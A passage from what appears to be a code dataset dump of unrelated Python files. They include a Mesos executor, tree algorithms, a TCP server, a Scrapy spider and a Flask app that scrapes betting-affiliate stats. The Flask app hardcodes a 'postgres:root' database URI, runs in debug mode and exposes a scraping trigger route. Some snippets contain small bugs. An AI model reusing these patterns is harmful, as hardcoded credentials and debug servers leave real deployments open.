NoopBackupStoreProvider\nfrom twitter.common.dirutil import safe_mkdir\nfrom twitter.common import app\nfrom twitter.common.log.options import LogOptions\nimport json\nimport mesos.native\nimport string\n\n\nHYALINE_MODULE = 'hyaline.executor'\nASSET_RELPATH = 'files'\nAGENTDIR = \"mesos-agent-workdir\"\n\ndef chmod_scripts(path):\n \"\"\"Make scripts executable.\"\"\"\n if path.endswith('.sh'):\n st = os.stat(path)\n os.chmod(path, st.st_mode | stat.S_IEXEC)\n\n\n# LogOptions.disable_disk_logging()\n# LogOptions.set_stderr_log_level('google:INFO')\n\ndef proxy_main():\n app.add_option(\n '--task_id',\n dest='task_id',\n default=None,\n help='task_id')\n app.add_option(\n '--executor_log_dir',\n dest = 'executor_log_dir',\n default = None,\n help = 'executor_log_dir')\n app.add_option(\n '--log_delete_timeout',\n dest = 'log_delete_timeout',\n default = None,\n help = 'log_delete_timeout')\n app.add_option(\n '--log_group_number',\n dest = 'log_group_number',\n default = None,\n help = 'log_group_number')\n app.add_option(\n '--log_switch_size',\n dest = 'log_switch_size',\n default = None,\n help = 'log_switch_size')\n app.add_option(\n '--log_clean_hour',\n dest = 'log_clean_hour',\n default = None,\n help = 'log_clean_hour')\n app.add_option(\n '--log_clean_minite',\n dest = 'log_clean_minite',\n default = None,\n help = 'log_clean_minite')\n def main(args, options):\n # 'sandbox' directory resides under the working directory assigned by the Mesos slave.\n #####################################\n # committer: mahongchao\n # commit_time:2016-08-26\n ####################################\n task_id = options.task_id\n log_configure = dict(log_dir=str(options.executor_log_dir),\n log_group_number=str(options.log_group_number),\n log_delete_timeout=str(options.log_delete_timeout),\n log_switch_size=str(options.log_switch_size),\n log_clean_hour=str(options.log_clean_hour),\n log_clean_minite=str(options.log_clean_minite))\n log_dir = os.path.join(log_configure[\"log_dir\"], task_id)\n safe_mkdir(log_dir)\n log.set_log(os.path.join(log_dir, \"hyaline-executor-info\"),\n os.path.join(log_dir, \"hyaline-executor-error\"),\n int(log_configure[\"log_switch_size\"]),\n int(log_configure[\"log_group_number\"]),\n int(log_configure[\"log_delete_timeout\"]),\n screen=True)\n sys.stderr = log.stderr_redirect\n log.info(\"Start hyaline executor.\")\n now = os.path.realpath('.')\n l = []\n for a, b, c in os.walk(now):\n for d in b:\n if \"volume-\" in d:\n l.append(d)\n detailed_path = {}\n if len(l) > 0:\n num = [int(string.split(v, \"-\")[1]) for v in l]\n min_l = \"volume-\" + str(min(num))\n for i in num:\n volume_link = os.path.join(now, \"volume-\"+str(i))\n os.chdir(volume_link)\n detailed_path[i] = os.path.realpath('.')\n\n sandbox_link = os.path.join(now, min_l)\n os.chdir(sandbox_link)\n volumes_dir = os.path.realpath('.')\n\n else:\n volumes_dir = now\n\n executor = HyalineExecutor(\n HyalineTaskRunnerProvider(\n MySQLTaskControlProvider(),\n BinaryMysqlInstallerProvider(), # Do not install any package.\n NoopBackupStoreProvider(),\n log_configure), # Do not recover any state.\n volumes_dir,detailed_path)\n ##################################################\n driver = mesos.native.MesosExecutorDriver(executor)\n driver.run()\n\n log.info('Exiting executor.')\n\n app.main()\n","sub_path":"hyaline/executor/hyaline_executor.py","file_name":"hyaline_executor.py","file_ext":"py","file_size_in_byte":4455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"254054160","text":"import sys\nsys.path.append('../BinarySearchTree/Src')\n\nimport copy\n\nfrom ArrayNodeTree import ArrayNodeTree\n\n# Print a tree in spiral order. To see what a spiral order is checkout below\n# http://www.geeksforgeeks.org/level-order-traversal-in-spiral-form/\n# So basically, this is a twist on BFS in which we alternate the order of printing at each level\n# This can be seen as a variation on printNodesByLevel() where we use a temp stack instead of a queue\ndef spiralOrderTraversal(treeNode):\n queue = []\n tempStack = []\n tempStack.append(treeNode)\n reverse = True\n while len(tempStack) != 0:\n lengthOfStack = len(tempStack)\n for i in range (lengthOfStack):\n queue.append(tempStack.pop()) # The difference between printNodesByLevel is here and *\n while len(queue) != 0:\n node = queue.pop(0) # and here *\n print(node.value)\n # We need to reverse the order of addition to the list at each level\n if(reverse):\n if node.leftPointer != None:\n tempStack.append(node.leftPointer)\n if node.rightPointer != None:\n tempStack.append(node.rightPointer)\n else:\n if node.rightPointer != None:\n tempStack.append(node.rightPointer)\n if node.leftPointer != None:\n tempStack.append(node.leftPointer) \n reverse = not reverse\n\n# Program to count leaf nodes in a binary tree\n# We use the usual technique - leaf nodes of tree = leaf nodes of left subtree + leaf nodes of right subtree\n# This is almost just like the size of tree question, except we only count the leafs\ndef countLeafNodes(treeRoot):\n if treeRoot.leftPointer == None and treeRoot.rightPointer == None:\n return 1\n leftTreeLeafNodesCount = 0\n rightTreeLeafNodesCount = 0\n if treeRoot.leftPointer != None:\n leftTreeLeafNodesCount = countLeafNodes(treeRoot.leftPointer)\n if treeRoot.rightPointer != None:\n rightTreeLeafNodesCount = countLeafNodes(treeRoot.rightPointer)\n return leftTreeLeafNodesCount + rightTreeLeafNodesCount \n\n# Determine if Two Trees are Identical\n# Two trees are identical when they have same data and arrangement of data is also same.\n# Note that 2 trees with the same pre/post order traversals may not be identical. This is easily seen\n# by considering that we can switch the execution of the recursive call to the left and right subtree in\n# in both traversals and not see a difference for parents of leaf nodes\n# Proof that 2 trees with the same in-order traversal may not be identical \n# http://stackoverflow.com/questions/1136999/reconstructing-a-tree-from-its-preorder-and-postorder-lists?lq=1\n# However, if 2 trees have the same in-order AND pre-order traversals, then they are identical\n# 2 Trees are identical if the current nodes are identical and the left and right subtrees are identical \ndef isIdentical(treeRoot, otherTreeRoot):\n if treeRoot is None and otherTreeRoot is None:\n return True\n elif treeRoot is not None and otherTreeRoot is not None:\n if treeRoot.value == otherTreeRoot.value:\n return isIdentical(treeRoot.leftPointer, otherTreeRoot.leftPointer) and isIdentical(treeRoot.rightPointer, otherTreeRoot.rightPointer) \n return False\n\n# Given pointers to two nodes in a Binary Tree, write a program to find the Lowest Common Ancestor (LCA) \n# We can use a generalization of the BST idea for this. If a node in the BST has one of the pointers in the left subtree and the other\n# in the right subtree then this is the LCA. Else, we recurse on the side of the node that has both pointers\n#\n# This function has 2 kind of return values. \n# It returns the LCM of node1 and node2 in the subtree rooted at treeRoot if both node1 and node2 are found in this subtree.\n# In the case that only one of the nodes is found in the subtree, then returns a pointer to that node\n# If none of the nodes are found, returns None\n# Hence, if a node has a pointer returned from the subtree rooted at the leftPointer and a node returned from a subtree\n# rooted at the right pointer, this must mean that the node is the LCM\n# For all parents of this LCM node, the LCM node will be returned \ndef returnBinaryTreeLCM(treeRoot, node1, node2):\n if treeRoot is None:\n return None\n \n # If the treeRoot is one of the targeted nodes, then the subtree contains one of the targeted nodes\n if treeRoot == node1 or treeRoot == node2:\n return treeRoot\n \n # Check which of the subtrees contains the nodes\n leftSubtreeResult = returnBinaryTreeLCM(treeRoot.leftPointer, node1, node2)\n rightSubtreeResult = returnBinaryTreeLCM(treeRoot.rightPointer, node1, node2)\n \n # If both subtrees contain the nodes, then 1 subtree must contain one of the nodes and the other\n # subtree must contain the other. Thus, the current node is the LCA\n if leftSubtreeResult is not None and rightSubtreeResult is not None:\n return treeRoot\n \n # If leftsubtree contains a node and the right subtree contains no nodes, then\n # the leftsubtree must contain both nodes\n if leftSubtreeResult is not None and rightSubtreeResult is None:\n return leftSubtreeResult\n \n # If rightsubtree contains a node and the left subtree contains no nodes, then\n # the rightsubtree must contain both nodes \n if leftSubtreeResult is None and rightSubtreeResult is not None:\n return rightSubtreeResult\n \n # Leaf nodes\n if leftSubtreeResult is None and rightSubtreeResult is None:\n return None\n\nif __name__ == \"__main__\":\n \n testTree = ArrayNodeTree()\n testTree.randomize(10)\n print(\"---\")\n \n #copyTree = copy.deepcopy(testTree)\n #print(isIdentical(copyTree.root, testTree.root))\n #print(countLeafNodes(testTree.root))\n #spiralOrderTraversal(testTree.root)","sub_path":"Data_Structures/Trees/Questions/Set1.py","file_name":"Set1.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"254823153","text":"def comparator(val_a, val_b):\n \"\"\"\n Default comparator, checks if val_a > val_b\n @param {number} val_a\n @param {number} val_b\n @return {bool} : True if val_a > val_b else False\n \"\"\"\n return val_a > val_b\n\n\ndef bubble(l, comparator=comparator):\n \"\"\"\n Bubble sort a given list\n @param {list} l - the list to sort\n @param {function(arg_a, arg_b)} - comparator\n function reference\n If return value is True, indices with values arg_a and arg_b will be swapped\n Default:\n comparator(val_a, val_b):\n return val_a > val_b\n @return {tuple(list, number)} - (sorted list, number of iterations) \n \"\"\"\n # outer bubble\n sweeps = 0\n for i in range(len(l) - 1, 0, -1):\n sweeps += 1\n is_sorted = True\n for j in range(i):\n if(comparator(l[j], l[j+1])):\n is_sorted = False\n swap(l, j, j+1)\n if is_sorted:\n break\n return (l, sweeps)\n\n\ndef swap(l, index_a, index_b):\n \"\"\"\n Swaps two index in a list\n @param {list} l - the list\n @param {number} index_a - The first index\n @param {number} index_b - The second index\n \"\"\"\n tmp = l[index_a]\n l[index_a] = l[index_b]\n l[index_b] = tmp\n","sub_path":"sorting/Bubble_Sort/python/bubble.py","file_name":"bubble.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"310536464","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 26 09:36:52 2019\n\n@author: heimi\n\"\"\"\n\n\nclass fastextConfig():\n VOC_DIM=100 ##100\n WORD_NGRAMS=2\n INIT_LEARN_RATE=0.01 ##0.001\n EPOCH_MAX=5\n IS_PRE_TRAIN=False\n MODEL_ID='fasttext_tagpack' ###good\n\n \n \n \n\nclass cnnConfig():\n GPU_DEVICES='-1' ##-1:CPU \n SEQ_LEN=40 #100\n MAX_WORDS=20000 ##20000 #5000\n VOC_DIM=100 ##100\n BATCH_SIZE=128##64 ###64\n INIT_LEARN_RATE=0.001 ##0.001\n EPOCH_MAX=50\n DROP_OUT_RATE=0.5 ###0.3\n EARLY_STOP_COUNT=6\n IS_PRE_TRAIN=False\n IS_STEM=True\n EMBED_TRAINABLE=True\n Y_NAME_LIST=['output1','output2']\n# MODEL_ID='cnn_model' ###good\n MODEL_ID='fasttext_model_test' ###good\n \n \n\n","sub_path":"Meorient/my_tagpack0809/fasttext_config.py","file_name":"fasttext_config.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"92893474","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('rango', '0040_auto_20160619_1446'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='userprofile',\n name='level',\n field=models.IntegerField(default=1),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='order',\n name='b_date',\n field=models.DateField(default=datetime.datetime(2016, 6, 19, 19, 56, 53, 109962)),\n ),\n migrations.AlterField(\n model_name='order',\n name='r_date',\n field=models.DateField(default=datetime.datetime(2016, 6, 19, 19, 56, 53, 110026)),\n ),\n ]\n","sub_path":"rango/migrations/0041_auto_20160619_1956.py","file_name":"0041_auto_20160619_1956.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"132563426","text":"#encoding=utf-8\n#tcp-server 多线程\n\nfrom socket import *\nimport threading\nimport time\n\nMAX_TO_CONN = 3\nBUFSIZ = 1024\nCODING = 'utf-8'\nHOST='0.0.0.0'\nPORT=21566\n\nclass Server(threading.Thread):\n\n def __init__(self, host=HOST, port=PORT):\n \"\"\"\n :param host: ip of server\n :param port: port of the server\n \"\"\"\n super().__init__()\n self.serv_host = host\n self.serv_port = port\n self.tcpS = socket(AF_INET, SOCK_STREAM) # 创建socket对象\n self.tcpS.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) # 加入socket配置,重用ip和端口\n self.tcpS.bind((host,port)) # 绑定ip端口号\n self.tcpS.listen(MAX_TO_CONN) # 设置最大链接数\n\n def deal_client(self,conn, addr):\n\n def send_client_msg(send_msg):\n conn.send(str(len('{}'.format(send_msg).encode(CODING))).encode(CODING)) # 发送msg的字节长度给已链接客户端\n conn.send(send_msg.encode(CODING)) # 发送消息给已链接客户端\n\n while True:\n data = \"\"\n try:\n data_size = conn.recv(BUFSIZ).decode(CODING) # 获取接收数据的字节长度\n while len(data.encode(CODING)) < int(data_size): # 持续接收数据\n data += conn.recv(BUFSIZ).decode(CODING) # msg form server\n except Exception:\n print(\"error while receive from client {},close the socket\\n\".format(addr))\n break\n else:\n if data == \"exit()\":\n print(\"receive exit() form {},close the socket\\n\".format(addr))\n break\n msg = '{} server receive context form {}:>{}'.format(time.strftime(\"%Y-%m-%d %X\"),addr, data)\n print(msg)\n send_msg = \"s\" * 2048 + \"拥有了\"\n send_client_msg(send_msg)\n conn.close() # 关闭客户端链接\n\n def run(self):\n print(\"server strat success,listening...\")\n while True:\n conn, addr = self.tcpS.accept()\n print(\"add client->\", addr)\n client = threading.Thread(target=self.deal_client, args=(conn, addr))\n client.start()\n\n\n\nif __name__ == '__main__':\n serv = Server()\n serv.run()\n","sub_path":"《Python从入门到精通 明日科技》python自学笔记/26,网络编程/TCP编程/6 收发较大数据/Server_thread.py","file_name":"Server_thread.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"131809998","text":"# -*- coding: utf-8 -*-\nimport scrapy, re\nfrom csdnspider.items import CsdnspiderItem\nfrom scrapy_redis.spiders import RedisSpider\n\nclass CsdnSpider(RedisSpider):\n '''此类继承了RedisSpider,负责主要的爬取功能'''\n name = 'csdn'\n #allowed_domains = ['edu.csdn.net/courses/k']\n #start_urls = ['http://edu.csdn.net/courses/k/']\n redis_key = 'csdnspider:start_urls' # Redis内的键值对\n\n def __init__(self, *args, **kwargs):\n '''\n 初始方法,设置在redis的配置\n :param args:\n :param kwargs:\n '''\n domain = kwargs.pop('domain', '')\n self.allowed_domains = filter(None, domain.split(','))\n super(CsdnSpider, self).__init__(*args, **kwargs)\n\n def parse(self, response):\n '''\n 爬虫具体数据的处理\n :param response: 网页返回参数\n :return: yield item\n '''\n item = CsdnspiderItem()\n item['title'] = response.xpath(\".//*[@id='course_detail_block1']/div/div[2]/h1/text()\").extract_first().strip() # 标题\n item['hours'] = response.xpath(\".//*[@id='course_detail_block1']/div/div[2]/div[1]/span[2]/text()\").extract_first() # 课时长度\n item['teacher'] = response.xpath(\".//div[@class='professor_name']/a/text()\").extract_first() # 讲师\n item['people'] = response.xpath(\".//*[@id='course_detail_block1']/div/div[2]/div[2]/span[2]/text()\").extract_first() # 适合人群\n item['number'] = response.xpath(\".//*[@id='course_detail_block1']/div/div[2]/div[2]/span[3]/span[2]/text()\").extract_first() # 参加人数\n item['price'] = response.xpath(\".//div[@class='sale']/span[@class='money']/text()\").extract_first().strip() # 价格\n item['desciption'] = response.xpath(\".//div[@class='outline_discribe_box J_outline_discribe_box']/span/text()\").extract_first().strip() # 介绍\n\n #print(item)\n yield item\n\n","sub_path":"ClassHomeWork/Week10/csdnspider/csdnspider/spiders/csdn.py","file_name":"csdn.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"603775285","text":"from flask import Flask, render_template, request, jsonify\nimport json\nfrom flask_sqlalchemy import SQLAlchemy\nfrom scrapping.bet365 import bet365_scrapping\nfrom scrapping.bet10 import bet10_scrapping\nfrom scrapping.titanbet import titan_scrapping\nfrom scrapping.betfred import betfred_scrapping\nfrom scrapping.coral import coral_scrapping\nfrom scrapping.eight88 import eight88_scrapping\nfrom scrapping.ladbrokes import ladbrokes_scrapping\nfrom scrapping.netbet import netbet_scrapping\nfrom scrapping.paddy import paddy_scrapping\nfrom scrapping.real import real_scrapping\nfrom scrapping.stan import stan_scrapping\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:root@localhost/josh'\ndb = SQLAlchemy(app)\n\nclass User(db.Model):\n __tablename__ = \"users\"\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(80), unique = True)\n email = db.Column(db.String(120), unique=True)\n\n def __init__(self, email):\n self.email = email\n\n def __repr__(self):\n return '' % self.email\n\n\nclass Bet365(db.Model):\n __tablename__ = \"bet365s\"\n id = db.Column(db.Integer, primary_key=True)\n sports = db.Column(db.Float)\n casino = db.Column(db.Float)\n poker = db.Column(db.Float)\n games_bingo = db.Column(db.Float)\n total = db.Column(db.Float)\n withdrawal = db.Column(db.Float)\n balance = db.Column(db.Float)\n\n def __init__(self, sports, casino, poker, games_bingo, total, withdrawal, balance):\n self.sports = sports\n self.casino = casino\n self.poker = poker\n self.games_bingo = games_bingo\n self.total = total\n self.withdrawal = withdrawal\n self.balance = balance\n\n\nclass Eight88(db.Model):\n __tablename__ = \"eight88s\"\n id = db.Column(db.Integer, primary_key=True)\n impression = db.Column(db.Integer)\n click = db.Column(db.Integer)\n registration = db.Column(db.Integer)\n lead = db.Column(db.Integer)\n money_player = db.Column(db.Integer)\n balance = db.Column(db.Float)\n\n def __init__(self, impression, click, registration, lead, money_player, balance):\n self.impression = impression\n self.click = click\n self.registration = registration\n self.lead = lead\n self.money_player = money_player\n self.balance = balance\n\n\nclass Bet10(db.Model):\n __tablename__ = \"bet10s\"\n id = db.Column(db.Integer, primary_key=True)\n merchant = db.Column(db.String(80), unique = True)\n impression = db.Column(db.Integer)\n click = db.Column(db.Integer)\n registration = db.Column(db.Integer)\n new_deposit = db.Column(db.Integer)\n commission = db.Column(db.String(80))\n\n def __init__(self, merchant, impression, click, registration, new_deposit, commission):\n self.merchant = merchant\n self.impression = impression\n self.click = click\n self.registration = registration\n self.new_deposit = new_deposit\n self.commission = commission\n\n\nclass RealDeal(db.Model):\n __tablename__ = \"realDeals\"\n id = db.Column(db.Integer, primary_key=True)\n merchant = db.Column(db.String(80), unique = True)\n impression = db.Column(db.Integer)\n click = db.Column(db.Integer)\n registration = db.Column(db.Integer)\n new_deposit = db.Column(db.Integer)\n commission = db.Column(db.Float)\n\n def __init__(self, merchant, impression, click, registration, new_deposit, commission):\n self.merchant = merchant\n self.impression = impression\n self.click = click\n self.registration = registration\n self.new_deposit = new_deposit\n self.commission = commission\n\n\n\nclass LadBroke(db.Model):\n __tablename__ = \"ladBrokes\"\n id = db.Column(db.Integer, primary_key=True)\n balance = db.Column(db.String(30))\n\n def __init__(self, balance):\n self.balance = balance\n\n\nclass BetFred(db.Model):\n __tablename__ = \"betFreds\"\n id = db.Column(db.Integer, primary_key=True)\n merchant = db.Column(db.String(80), unique = True)\n impression = db.Column(db.Integer)\n click = db.Column(db.Integer)\n registration = db.Column(db.Integer)\n new_deposit = db.Column(db.Integer)\n commission = db.Column(db.String(20))\n\n def __init__(self, merchant, impression, click, registration, new_deposit, commission):\n self.merchant = merchant\n self.impression = impression\n self.click = click\n self.registration = registration\n self.new_deposit = new_deposit\n self.commission = commission\n\n\nclass Paddy(db.Model):\n __tablename__ = \"paddyies\"\n id = db.Column(db.Integer, primary_key=True)\n balance = db.Column(db.String(20))\n\n def __init__(self, balance):\n self.balance = balance\n\n\nclass NetBet(db.Model):\n __tablename__ = \"netBets\"\n id = db.Column(db.Integer, primary_key=True)\n balance = db.Column(db.String(20))\n\n def __init__(self, balance):\n self.balance = balance\n\n\nclass TitanBet(db.Model):\n __tablename__ = \"titanBets\"\n id = db.Column(db.Integer, primary_key=True)\n balance = db.Column(db.String(20))\n\n def __init__(self, balance):\n self.balance = balance\n\n\nclass Stan(db.Model):\n __tablename__ = \"stans\"\n id = db.Column(db.Integer, primary_key=True)\n merchant = db.Column(db.String(80), unique = True)\n impression = db.Column(db.Integer)\n click = db.Column(db.Integer)\n registration = db.Column(db.Integer)\n new_deposit = db.Column(db.Integer)\n commission = db.Column(db.String(20))\n\n def __init__(self, merchant, impression, click, registration, new_deposit, commission):\n self.merchant = merchant\n self.impression = impression\n self.click = click\n self.registration = registration\n self.new_deposit = new_deposit\n self.commission = commission\n\n\nclass Coral(db.Model):\n __tablename__ = \"corals\"\n id = db.Column(db.Integer, primary_key=True)\n merchant = db.Column(db.String(80), unique = True)\n impression = db.Column(db.Integer)\n click = db.Column(db.Integer)\n registration = db.Column(db.Integer)\n new_deposit = db.Column(db.Integer)\n commission = db.Column(db.Float)\n\n def __init__(self, merchant, impression, click, registration, new_deposit, commission):\n self.merchant = merchant\n self.impression = impression\n self.click = click\n self.registration = registration\n self.new_deposit = new_deposit\n self.commission = commission\n\n\n\n@app.route('/')\ndef dashboard():\n\treturn render_template('home.html')\n\n\n@app.route('/bet365/')\ndef bet365():\n data = db.session.query(Bet365).all()[0]\n return render_template('pages/bet365.html', data = data)\n\n\n@app.route('/eight88/')\ndef eight88():\n\tdata = db.session.query(Eight88).all()[0]\n\treturn render_template('pages/eight88.html', data = data)\n\n\n@app.route('/bet10/')\ndef bet10():\n\tdata = db.session.query(Bet10).all()[0]\n\treturn render_template('pages/bet10.html', data = data)\n\n\n@app.route('/realDeal/')\ndef realDeal():\n\tdata = db.session.query(RealDeal).all()[0]\n\treturn render_template('pages/realDeal.html', data = data)\n\n\n@app.route('/ladBroke/')\ndef ladBroke():\n\tdata = db.session.query(LadBroke).all()[0]\n\treturn render_template('pages/ladBroke.html', data = data)\n\n\n@app.route('/betFred/')\ndef betFred():\n\tdata = db.session.query(BetFred).all()[0]\n\treturn render_template('pages/betFred.html', data = data)\n\n\n@app.route('/paddy/')\ndef paddy():\n\tdata = db.session.query(Paddy).all()[0]\n\treturn render_template('pages/paddy.html', data = data)\n\n\n@app.route('/netBet/')\ndef netBet():\n\tdata = db.session.query(NetBet).all()[0]\n\treturn render_template('pages/netBet.html', data = data)\n\n\n@app.route('/titanBet/')\ndef titanBet():\n\tdata = db.session.query(TitanBet).all()[0]\n\treturn render_template('pages/titanBet.html', data = data)\n\n\n@app.route('/stan/')\ndef stan():\n\tdata = db.session.query(Stan).all()[0]\n\treturn render_template('pages/stan.html', data = data)\n\n\n@app.route('/coral/')\ndef coral():\n\tdata = db.session.query(Coral).all()[0]\n\treturn render_template('pages/coral.html', data = data)\n\n\n@app.route('/skyBet')\ndef skyBet():\n data = \"Woops, credential is not valid. Please tell me account info.\"\n return render_template('pages/error.html', data = data)\n\n\n@app.route('/william')\ndef william():\n data = \"Woops, credential is not valid. Please tell me account info.\"\n return render_template('pages/error.html', data = data)\n\n\n@app.route('/victor')\ndef victor():\n data = \"Woops, credential is not valid. Please tell me account info.\"\n return render_template('pages/error.html', data = data)\n\n\n@app.route('/testing/')\ndef testing():\n # # NetBet insert data starting\n # data = netbet_scrapping()\n \n # balance = data\n # result = NetBet(balance)\n # db.session.add(result)\n # db.session.commit()\n\n #Bet365 insert data starting\n data = bet365_scrapping()\n \n sports = float(data[0])\n casino = float(data[1])\n poker = float(data[2])\n games_bingo = float(data[3])\n total = float(data[4])\n withdrawal = float(data[5])\n balance = float(data[6])\n result = Bet365(sports, casino, poker, games_bingo, total, withdrawal, balance)\n\n db.session.add(result)\n db.session.commit()\n\n # Eight88 insert data starting\n data = eight88_scrapping()\n \n impression = int(data[0])\n click = int(data[1])\n registration = int(data[2])\n lead = int(data[3])\n money_player = int(data[4])\n result = Eight88(impression, click, registration, lead, money_player, 999)\n\n db.session.add(result)\n db.session.commit()\n\n #Bet10 insert data starting\n data = bet10_scrapping()\n \n merchant = str(data[0])\n impression = int(data[1])\n click = int(data[2])\n registration = int(data[3])\n new_deposit = int(data[4])\n commission = float(data[5])\n result = Bet10(merchant, impression, click, registration, new_deposit, commission)\n\n db.session.add(result)\n db.session.commit()\n\n # RealBet insert data starting\n data = real_scrapping()\n \n merchant = str(data[0])\n impression = int(data[1])\n click = int(data[2])\n registration = int(data[3])\n new_deposit = int(data[4])\n commission = str(data[5])\n result = RealDeal(merchant, impression, click, registration, new_deposit, commission)\n\n db.session.add(result)\n db.session.commit()\n\n #Ladbrokes insert data starting\n data = ladbrokes_scrapping()\n \n balance = data\n result = LadBroke(balance)\n\n db.session.add(result)\n db.session.commit()\n\n #BetFred insert data starting\n data = betfred_scrapping()\n \n merchant = str(data[0])\n impression = int(data[1])\n click = int(data[2])\n registration = int(data[3])\n new_deposit = int(data[4])\n commission = str(data[5])\n result = BetFred(merchant, impression, click, registration, new_deposit, commission)\n\n db.session.add(result)\n db.session.commit()\n\n #Paddy insert data starting\n data = paddy_scrapping()\n \n balance = data\n result = Paddy(balance)\n\n db.session.add(result)\n db.session.commit()\n\n #TitanBet insert data starting\n data = titan_scrapping()\n \n balance = data\n result = TitanBet(balance)\n\n db.session.add(result)\n db.session.commit() \n\n #Stan insert data starting\n data = stan_scrapping()\n \n merchant = data[0]\n impression = int(data[1])\n click = int(data[2])\n registration = int(data[3])\n new_deposit = int(data[4])\n commission = data[5]\n result = Stan(merchant, impression, click, registration, new_deposit, commission)\n\n db.session.add(result)\n db.session.commit()\n\n #Coral insert data starting\n data = coral_scrapping()\n \n merchant = data[0]\n impression = int(data[1])\n click = int(data[2])\n registration = int(data[3])\n new_deposit = int(data[4])\n commission = float(data[5])\n result = Coral(merchant, impression, click, registration, new_deposit, commission)\n\n db.session.add(result)\n db.session.commit()\n \n return ('Thanks for your time')\n\n\nif __name__ == '__main__':\n\tapp.debug = True\n\tapp.run()","sub_path":"flaskapp.py","file_name":"flaskapp.py","file_ext":"py","file_size_in_byte":12135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"240593711","text":"#!/usr/bin/env python\nfrom math import sqrt,pi, cos, sin, atan2\nfrom random import random\nimport matplotlib.pyplot as plt\nfrom numpy import linspace\n\nWIDTH = 150\nLENGTH = 150\nTITLE = ' RRT star'\n\ntic = 8\nobstacles=[]\nEPSILON = 10\nneighborhood = 1.75*EPSILON\n#goals = [(16.5,16.5),(16.5,49.5),(16.5,82.5),(49.5,16.5),(49.5,49.5),(49.5,82.5),(82.5,16.5),(82.5,49.5),(82.5,82.5)]\n\ngoals = [(16.5,82.5),(49.5,82.5),(82.5,82.5),(16.5,49.5),(49.5,49.5),(82.5,49.5),(16.5,16.5),(49.5,16.5),(82.5,16.5)]\n\nSTART_X,START_Y = 150,150 \nstart = [START_X,START_Y]\n\nGOAL_X, GOAL_Y = 0,50\nRADIUS = 6\nradius=18\n\n\n## Import goals\n\n# with open('goals.txt') as data:\n# for l in data:\n# x,y,r = l.split(',')\n# x,y,r = int(x), int(y), float(r)\n# goals.append([x,y,r])\n\n##Define Node Class\nclass Node:\n\n def __init__(self, x=0,y=0,parent=None):\n \n self.x = x\n self.y = y\n self.parent = parent\n\n def __str__(self):\n return '({}, {})'.format(self.x, self.y)\n\n def distance_to(self, node):\n distance = sqrt((self.x - node.x)**2 + (self.y - node.y)**2)\n return distance\n \n # def closest(self, nodes):\n # best_distance = self.distance_to(node[0])\n # best_node = node[0]\n # for node in nodes:\n # current_distance = self.distance_to(node)\n # if current_distance < best_distance:\n # best_distance = current_distance\n # best_node = node\n # print(best_node)\n # return best_node\n\n # def closest1(self, nodes):\n # distances = []\n # for node in nodes:\n # distances.append(self.distance_to(node))\n # min_distance = min(distances)\n # min_index = distances.index(min_distance)\n # return nodes[min_index]\n\n \n \n def closest2(self, nodes):\n return min(nodes, key=self.distance_to)\n\n def path_to_start(self):\n path = []\n path.append(self)\n current_node = self\n\n while current_node.parent != None:\n path.append(current_node.parent)\n current_node = current_node.parent\n return path\n def cost_to_start(self):\n path = []\n cost = 0\n path.append(self)\n current_node = self\n\n while current_node.parent != None:\n path.append(current_node.parent)\n current_node = current_node.parent\n for node in path:\n if node.parent != None:\n cost += node.distance_to(node.parent)\n return cost\n\n def cost_to_start_through_node(self,node):\n return node.cost_to_start()+self.distance_to(node)\n\n def self_cost_to_start_through_node(self,node):\n return self.cost_to_start()+self.distance_to(node)\n\n def optimal(self,nodes):\n return min(nodes, key=self.cost_to_start_through_node)\n\ndef get_goal(tic):\n if tic == 1:\n GOAL_X, GOAL_Y = goals[0]\n elif tic == 2:\n GOAL_X, GOAL_Y = goals[1]\n elif tic == 3:\n GOAL_X, GOAL_Y = goals[2]\n elif tic == 4:\n GOAL_X, GOAL_Y = goals[3]\n elif tic == 5:\n GOAL_X, GOAL_Y = goals[4]\n elif tic == 6:\n GOAL_X, GOAL_Y = goals[5]\n elif tic == 7:\n GOAL_X, GOAL_Y = goals[6]\n elif tic == 8:\n GOAL_X, GOAL_Y = goals[7]\n elif tic == 9:\n GOAL_X, GOAL_Y = goals[8]\n\n goal = [GOAL_X,GOAL_Y, RADIUS]\n return goal\n\n\ndef collision(new_node,obstacles):\n for i in range(len(obstacles)):\n dist_obs = sqrt(pow(new_node.x-obstacles[i][0],2)+pow(new_node.y-obstacles[i][1],2))\n if dist_obs <= radius+1: #or new_node[0] <= 0 or new_node[0] >= width or new_node[1] <= 0 or new_node[1] >= length:\n collision_flag = 1\n return collision_flag\n # if newnode[0] <= 0 or newnode[0] >= width or newnode[1] <= 0 or newnode[1] >= length:\n # collision_flag = 1\n #return collision_flag\n else:\n collision_flag = 0\n\n\n\ndef setup_space(goal):\n figure, ax = plt.subplots(facecolor='white')\n ax.set_ylim((0,LENGTH))\n ax.set_xlim((0,WIDTH))\n plt.xlim()\n plt.ylim()\n plt.title(TITLE)\n ax.set_axis_bgcolor('white')\n start_n = plt.Circle((start[0],start[1]),1, color = 